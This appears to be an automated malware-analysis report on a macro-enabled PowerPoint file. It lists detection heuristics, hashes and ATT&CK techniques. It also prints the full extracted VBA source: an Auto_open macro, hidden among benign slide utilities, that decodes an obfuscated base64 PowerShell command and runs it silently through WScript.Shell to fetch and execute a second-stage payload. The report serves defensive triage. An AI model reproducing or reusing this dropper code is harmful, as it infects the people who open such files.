MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The OOXML document contains VBA macros, indicated by the 'OOXML_VBA' and 'OLE_VBA_AUTO' heuristics. The 'OLE_VBA_WSCRIPT' and 'OLE_VBA_CREATEOBJ' firings suggest the macro attempts to use WScript.Shell and CreateObject to execute commands or download payloads. The Auto_open macro is present, which is a common entry point for malicious VBA code. The script attempts to construct a string that appears to be a command for downloading and executing a second-stage payload.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
dawgaxxvgirqrwuyeenugfynqynxzox = "WSCript.shell" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set dhdzxqevsrpzgkqzhwrpbrbxmwevvfn = CreateObject(dawgaxxvgirqrwuyeenugfynqynxzox) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Public Sub Auto_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8313 bytes |
SHA-256: a0cb27366b2286a3ba63c29fff42c3609700bff8e2cedc31ba21c159fdccbeae |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "spswlafcuepklidrm"
Sub ExportSlideAsImage()
Dim imageType As String
Dim pptName As String
Dim imageName As String
Dim mySlide As Slide
' Export current Slide to Image
imageType = "png" ' or jpg or bmp
pptName = ActivePresentation.FullName
imageName = Left(pptName, InStr(pptName, ".")) & imageType
Set mySlide = Application.ActiveWindow.View.Slide
mySlide.Export imageName, imageType
End Sub
Public Sub Auto_open()
dc.ra
kghk = hfdghfd
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "dc"
Sub ToggleCaseBetweenUpperAndNormal()
Dim mySlide As Slide
Dim shp As Shape
' Toggle between Upper Case and Normal Case for all slides
For Each mySlide In ActivePresentation.Slides
For Each shp In mySlide.Shapes
If shp.Type = 17 Then ' msoTextBox = 17
' Toggle between Upper Case and Normal Case
shp.TextFrame2.TextRange.Font.Allcaps = _
Not shp.TextFrame2.TextRange.Font.Allcaps
End If
Next shp
Next mySlide
End Sub
Sub ra()
rykg = ioyukiu(183) & ioyukiu(225) & ioyukiu(216) & ioyukiu(148) & ioyukiu(163) & ioyukiu(183) & ioyukiu(148) & ioyukiu(228) & ioyukiu(227) & ioyukiu(210) & ioyukiu(235) & ioyukiu(210) & ioyukiu(185) & ioyukiu(230) & ioyukiu(199) & ioyukiu(210) & ioyukiu(188) & ioyukiu(217) & ioyukiu(210) & ioyukiu(224) & ioyukiu(224) & ioyukiu(148) & ioyukiu(161) & ioyukiu(185) & ioyukiu(148)
rykg = rykg & "WwBTAFkAUwBUAEUATQAuAFQARQB4AFQALgBFAE4AQwBvAGQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQARQAuAGcAZQB0AFMAdABSAGkATgBnACgAWwBzAFkAUwB0AEUAbQAuAGMAbwBOAHYARQByAHQAXQA6ADoARgBSAG8AbQBCAGEAcwBlADYANABzAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASw"
rykg = rykg & "BBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAUQBBAFoAUQBCAG4AQQBIAGMAQQBZAFEAQgA0AEEASABRAEEAYgBnAEIAbABBAEgAUQBBAGEAQQBCAHUAQQBHAHcAQQBhAEEAQgAwAEEASABJAEEAYQBBAEIAeQBBAEcARQBBAFoAZwBCADEAQQBHADgAQQBZAFEAQgBuAEEARwBnAEEAWQBnAEIANgBBAEgAQQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwBRAEIAbQBBAEcARQBBAGMAQQBCAHgAQQBHAGsAQQBZAGcAQgAxAEEARwBFAEEAWQBRAEIAcQBBAEgAQQBBAGEAZwBCAHIAQQBHAGcAQQBiAHcAQgAxAEEAQwBBAEEATABBAEEAZwBBAEMAUQBBAGMAQQBCAHcAQQBIAGsAQQBhAGcAQgBuAEEARwBrAEEAYgBnAEIAcwBBAEcAVQBBAFoAQQBCAGgAQQBIAEEAQQBlAFEAQQBnAEEAQwBrAEEARABRAEEASwBBAEgAcwBBAEkAQQBCAEoAQQBH"
rykg = rykg & "ADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAGIAdwBCAEUAQQBGAFUAQQBiAEEAQgBGAEEAQwBBAEEAWQBnAEIAcABBAEgAUQBBAFUAdwBCADAAQQBGAEkAQQBZAFEAQgBPAEEARgBNAEEAWgBnAEIAbABBAEYASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgBVAEEARQBFAEEAYwBnAEIAMABBAEMAMABBAFEAZwBCAEoAQQBGAFEAQQBVAHcAQgAwAEEASABJAEEAWQBRAEIATwBBAEgATQBBAFIAZwBCAEYAQQBIAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAVgBBAEgASQBBAFEAdwBCAEYAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwBRAEIAbQBBAEcARQBBAGMAQQBCAHgAQQBHAGsAQQBZAGcAQgAxAEEARwBFAEEAWQBRAEIAcQBBAEgAQQBBAGEAZwBCAHIAQQBHAGcAQQBiAHcAQgAxAEEAQwBBAEEATABRAEIARQBBAEcAVQBBAFUAdwBCAFUAQQBFAGsAQQBiAGcAQgBoAEEASABRAE"
rykg = rykg & "EAYQBRAEIAdgBBAEUANABBAEkAQQBBAGsAQQBIAEEAQQBjAEEAQgA1AEEARwBvAEEAWgB3AEIAcABBAEcANABBAGIAQQBCAGwAQQBHAFEAQQBZAFEAQgB3AEEASABrAEEATwB3AEEAZwBBAEMAWQBBAEkAQQBBAGsAQQBIAEEAQQBjAEEAQgA1AEEARwBvAEEAWgB3AEIAcABBAEcANABBAGIAQQBCAGwAQQBHAFEAQQBZAFEAQgB3AEEASABrAEEATwB3AEEAZwBBAEgAMABBAGQAQQBCAHkAQQBIAGsAQQBlAHcAQQBrAEEARwAwAEEAWQB3AEIAagBBAEgAYwBBAGIAQQBCAHUAQQBHAHcAQQBaAEEAQgB3AEEASABvAEEAZABRAEIAbgBBAEcAcwBBAFoAZwBCADUAQQBHAHcAQQBkAGcAQgBtAEEASABNAEEAYwBnAEIAawBBAEgAVQBBAGUAUQBCAGkAQQBIAEUAQQBlAEEAQgBwAEEARAAwAEEASgBBAEIARgBBAEUANABBAGQAZwBBADYAQQBIAFEAQQBSAFEAQgB0AEEARgBBAEEASwB3AEEAbgBBAEYAdwBBAGEA"
rykg = rykg & "ZwBCAHcAQQBIAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAFEAQQBaAFEAQgBuAEEASABjAEEAWQBRAEIANABBAEgAUQBBAGIAZwBCAGwAQQBIAFEAQQBhAEEAQgB1AEEARwB3AEEAYQBBAEIAMABBAEgASQBBAGEAQQBCAHkAQQBHAEUAQQBaAGcAQgAxAEEARwA4AEEAWQBRAEIAbgBBAEcAZwBBAFkAZwBCADYAQQBIAEEAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAE8AZwBBAHYAQQBDADgAQQBNAFEAQQA1AEEARABVAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQB3AEEAeQBBAEMAOABBAGQAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAFEAQgBqAEEARwBNAEEAZAB3AEIAcwBBAEcANABBAGIAQQBCAGsAQQBIAEEAQQBlAGcAQg"
rykg = rykg & "AxAEEARwBjAEEAYQB3AEIAbQBBAEgAawBBAGIAQQBCADIAQQBHAFkAQQBjAHcAQgB5AEEARwBRAEEAZABRAEIANQBBAEcASQBBAGMAUQBCADQAQQBHAGsAQQBPAHcAQQBOAEEAQQBvAEEAZABBAEIAbABBAEcAYwBBAGQAdwBCAGgAQQBIAGcAQQBkAEEAQgB1AEEARwBVAEEAZABBAEIAbwBBAEcANABBAGIAQQBCAG8AQQBIAFEAQQBjAGcAQgBvAEEASABJAEEAWQBRAEIAbQBBAEgAVQBBAGIAdwBCAGgAQQBHAGMAQQBhAEEAQgBpAEEASABvAEEAYwBBAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBOAEEAQQB5AEEAQwA0AEEATQBRAEEAeABBAEQAQQBBAEwAZwBBAHoAQQBEAEkAQQBMAHcAQgAwAEEARwA4AEEAZAB3AEIAbABBAEgASQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQBuAEEAQwBBAEEASgBBAEIAdABB"
rykg = rykg & "AEcATQBBAFkAdwBCADMAQQBHAHcAQQBiAGcAQgBzAEEARwBRAEEAYwBBAEIANgBBAEgAVQBBAFoAdwBCAHIAQQBHAFkAQQBlAFEAQgBzAEEASABZAEEAWgBnAEIAegBBAEgASQBBAFoAQQBCADEAQQBIAGsAQQBZAGcAQgB4AEEASABnAEEAYQBRAEEANwBBAEEAMABBAEMAZwBCADAAQQBHAFUAQQBaAHcAQgAzAEEARwBFAEEAZQBBAEIAMABBAEcANABBAFoAUQBCADAAQQBHAGcAQQBiAGcAQgBzAEEARwBnAEEAZABBAEIAeQBBAEcAZwBBAGMAZwBCAGgAQQBHAFkAQQBkAFEAQgB2AEEARwBFAEEAWgB3AEIAbwBBAEcASQBBAGUAZwBCAHcAQQBDAEEAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATQBnAEEAMABBAEQASQBBAEwAZwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABNAEEATQBnAEEAdgBBAEgAUQBBAGIAdwBCADMAQQBHAF"
rykg = rykg & "UAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHADAAQQBZAHcAQgBqAEEASABjAEEAYgBBAEIAdQBBAEcAdwBBAFoAQQBCAHcAQQBIAG8AQQBkAFEAQgBuAEEARwBzAEEAWgBnAEIANQBBAEcAdwBBAGQAZwBCAG0AQQBIAE0AQQBjAGcAQgBrAEEASABVAEEAZQBRAEIAaQBBAEgARQBBAGUAQQBCAHAAQQBEAHMAQQBEAFEAQQBLAEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQA9ACIAKQApAHwAaQBFAFgA"
On Error Resume Next
olnacslzleebjy = rykg
qvwrg (olnacslzleebjy)
End Sub
Sub RemoveUnderlineFromDescenders()
Dim mySlide As Slide
Dim shp As Shape
Dim descenders_list As String
Dim phrase As String
Dim x As Long
' Remove underlines from Descenders
descenders_list = "gjpqy"
For Each mySlide In ActivePresentation.Slides
For Each shp In mySlide.Shapes
If shp.Type = 17 Then ' msoTextBox = 17
' Remove underline from letters "gjpqy"
With shp.TextFrame.TextRange
phrase = .Text
For x = 1 To Len(.Text)
If InStr(descenders_list, Mid$(phrase, x, 1)) > 0 Then
.Characters(x, 1).Font.Underline = False
End If
Next x
End With
End If
Next shp
Next mySlide
End Sub
Function qvwrg(xntowwnxoxygygsltmzeiwhq As String)
rftjs = 9 - 9
CSDCDS = "dcdv hgfn mjhgmj"
dawgaxxvgirqrwuyeenugfynqynxzox = "WSCript.shell"
Set dhdzxqevsrpzgkqzhwrpbrbxmwevvfn = CreateObject(dawgaxxvgirqrwuyeenugfynqynxzox)
qmrtvdvzgbvpi = dhdzxqevsrpzgkqzhwrpbrbxmwevvfn.Run(xntowwnxoxygygsltmzeiwhq, rftjs)
End Function
Sub RemoveAnimationsFromAllSlides()
Dim mySlide As Slide
Dim i As Long
For Each mySlide In ActivePresentation.Slides
For i = mySlide.TimeLine.MainSequence.Count To 1 Step -1
'Remove Each Animation
mySlide.TimeLine.MainSequence.Item(i).Delete
Next i
Next mySlide
End Sub
Function ioyukiu(cdssf As Variant)
dfvfd = "bdhgf bgfb 789"
ioyukiu = Chr(cdssf - 116)
gtergt = "terg uyti gr dh jy fe"
End Function
Sub SavePresentationAsPDF()
Dim pptName As String
Dim PDFName As String
' Save PowerPoint as PDF
pptName = ActivePresentation.FullName
' Replace PowerPoint file extension in the name to PDF
PDFName = Left(pptName, InStr(pptName, ".")) & "pdf"
ActivePresentation.ExportAsFixedFormat PDFName, 2 ' ppFixedFormatTypePDF = 2
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 54784 bytes |
SHA-256: 423c9142829fbbc101f4ae5d17ee938e58afb3552ddea6544b4a24742d512b4e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.